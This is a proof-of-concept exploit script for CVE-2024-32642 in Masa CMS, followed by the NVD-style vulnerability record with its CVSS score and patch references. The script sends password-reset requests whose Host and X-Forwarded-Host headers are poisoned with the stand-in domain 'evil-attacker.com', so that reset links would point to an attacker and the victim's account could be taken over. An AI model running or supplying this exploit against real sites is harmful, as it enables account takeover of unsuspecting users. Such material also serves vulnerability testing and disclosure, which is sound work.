CVE-2024-32642

import requests # CVE-2024-32642 PoC - Host Header Poisoning for Account Takeover # Target: Masa CMS < 7.2.8, 7.3.13, 7.4.6 target_url = "http://target-site.com/index.cfm/fuseaction/users.lostpassword" payload_host = "evil-attacker.com" headers = { "Host": payload_host, "User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml", } response = requests.post( target_url, headers=headers, data={ "email": "[email protected]", "submit": "Submit" }, allow_redirects=False, verify=False ) # Check if the password reset email contains the attacker's domain if payload_host in response.text or response.status_code == 302: print(f"[+] Host Header Poisoning vulnerability confirmed!") print(f"[+] Malicious host injected: {payload_host}") print(f"[*] Check email for password reset link pointing to {payload_host}") else: print("[-] Vulnerability not detected or target not vulnerable") # Alternative: Check for X-Forwarded-Host header injection alt_headers = { "Host": "legitimate-site.com", "X-Forwarded-Host": payload_host, "User-Agent": "Mozilla/5.0", } response2 = requests.post( target_url, headers=alt_headers, data={"email": "[email protected]", "submit": "Submit"}, allow_redirects=False, verify=False ) if payload_host in str(response2.headers): print(f"[+] X-Forwarded-Host injection also works!")

{"cve": {"id": "CVE-2024-32642", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:48.543", "lastModified": "2025-12-05T15:36:02.963", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Masa CMS is an open source Enterprise Content Management platform. Prior to 7.2.8, 7.3.13, and 7.4.6, there is vulnerable to host header poisoning which allows account takeover via password reset email. This vulnerability is fixed in 7.2.8, 7.3.13, and 7.4.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-346"}, {"lang": "en", "value": "CWE-640"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.2.8", "matchCriteriaId": "82A74C33-3407-498A-9444-4A451E5968FE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.3", "versionEndExcluding": "7.3.13", "matchCriteriaId": "45C4FA2D-DCEF-4991-B21D-C2BAC3A9DF5C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:masacms:masacms:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.6", "matchCriteriaId": "ED61DA62-94D4-4081-923F-2674CFC7945A"}]}]}], "references": [{"url": "https://github.com/MasaCMS/MasaCMS/commit/7541b9c99fb9e32d1de6f2658750525cec1d8960", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/MasaCMS/MasaCMS/security/advisories/GHSA-qjm6-c8hx-ffh8", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}